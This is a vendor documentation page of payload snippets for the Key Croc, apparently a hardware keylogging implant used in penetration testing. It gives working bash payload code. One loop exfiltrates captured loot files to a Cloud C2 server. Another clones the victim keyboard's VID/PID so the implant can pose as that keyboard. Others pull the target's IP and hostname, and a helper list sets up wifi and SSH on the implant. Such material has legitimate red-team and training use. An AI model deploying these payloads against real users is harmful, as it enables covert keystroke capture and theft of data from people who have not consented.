Key Croc
Search…
Helpful Payload Snippets

EXFILTRATE MULTIPLE FILES USING C2EXFIL

The C2EXFIL tool, used to exfiltrate files to the configured Cloud C2 server, normally only handles one file at a time. Using a for loop, one may iterate over multiple files in a directory.
1
FILES="$LOOT_DIR/*.txt"
2
for f in $FILES; do C2EXFIL STRING $f Example; done
Copied!

ADD AN ATTACKMODE WITH THE CLONED VID AND PID VALUES

By default the Key Croc boots into Attack Mode and clones the VID and PID values of the connected human interface device (HID Keyboard).
The VID and PID values are stored in the /tmp/vidpid directory and may be referenced in a payload using the following:
1
# Set ATTACKMODE to HID and Ethernet with cloned keyboard VID/PID
2
VENDOR=$(cat /tmp/vidpid | cut -d: -f1)
3
PRODUCT=$(cat /tmp/vidpid | cut -d: -f2)
4
ATTACKMODE HID ECM_ETHERNET VID_0X$VENDOR PID_0X$PRODUCT
Copied!

CHECKING CURRENT MODE (ATTACK OR ARMING)

If the Key Croc is in the Attack Mode, rather than Arming Mode, the /tmp/attackmode file will exist.
Checking the current ATTACKMODE
The Key Croc stores its current ATTACKMODE in the file /tmp/mode. In addition to the ATTACKMODE options like HID or SERIAL, the /tmp/mode file reports all additional parameters such as VID and PID. These values may be passed to a new ATTACKMODE command using the bash command substitution feature. In this example, the output of "cat /tmp/mode", inside of the $() directive, is substituted.
1
[email protected]:~# cat /tmp/mode
2
HID VID_0X04B3 PID_0X3025
3
[email protected]:~# ATTACKMODE ECM_ETHERNET $(cat /tmp/mode)
4
TARGET_IP = 172.16.64.10, TARGET_HOSTNAME = kali, HOST_IP = 172.16.64.1
Copied!

GETTING THE TARGET HOSTNAME AND IP ADDRESS

While the ECM_ETHERNET and RNDIS_ETHERNET options for ATTACKMODE will display the Target IP address and hostname interactively, these values may also be used in a payload. To store these values in a variable, use the following:
1
GET_VARS
2
# This exports the following variables:
3
$TARGET_IP
4
$TARGET_HOSTNAME
5
$HOST_IP
Copied!
Alternatively, these target values may be obtained from the following:
1
TARGET_IP=$(cat /var/lib/dhcp/dhcpd.leases | grep ^lease | awk '{ print $2 }' | sort | uniq)
2
TARGET_HOSTNAME=$(cat /var/lib/dhcp/dhcpd.leases | grep hostname | awk '{print $2 }' | sort | uniq | tail -n1 | sed "s/^[ \t]*//" | sed 's/\"//g' | sed 's/;//')
Copied!
And the host IP (the IP address of the Key Croc itself) can be determined with the following:
1
HOST_IP=$(cat /etc/network/interfaces.d/usb0 | grep address | awk {'print $2'})
Copied!
However, unless changed from its default this value will be 172.16.64.1.

FRAMEWORK HELPERS

From firmware 1.3+, many functions of the Key Croc may be exposed by sourcing the croc_framework. The GET_HELPERS command provides an outline of their functions:
1
[email protected]:~/loot# GET_HELPERS
2
Available helper functions provided by sourcing croc_framework
3
4
MOUNT_UDISK
5
Mounts udisk and handles syncing /root/loot/ and /root/udisk/loot
6
7
UNMOUNT_UDISK
8
Safely Unmounts udisk
9
10
UPDATE_LANGUAGES
11
Copy language files from udisk to the croc
12
13
ENABLE_INTERFACE
14
Enables wlan0
15
16
CLEAR_WIFI_CONFIG
17
Remove wpa_supplicant.conf to clear current wireless configuration
18
19
CONFIG_OPEN_WIFI
20
Generate a wpa_supplicant.conf for open wifi
21
Example: CONFIG_OPEN_WIFI 'attwifi'
22
23
CONFIG_PSK_WIFI
24
Generate a wpa_supplicant.conf for psk wifi
25
Example: CONFIG_PSK_WIFI 'attwifi' 'password'
26
27
START_WLAN_DHCP
28
Start dhcp on wlan0
29
30
ENABLE_WIFI
31
Enable wifi helper
32
configures wpa_supplicant, indicates using LED,
33
enables interface, starts wpa_supplicant and dhcp
34
Example psk: ENABLE_WIFI 'attwifi' 'password'
35
Example open: ENABLE_WIFI 'attwifi'
36
37
DISABLE_SSH
38
Disable SSH service
39
40
ENABLE_SSH
41
Enable SSH service
Copied!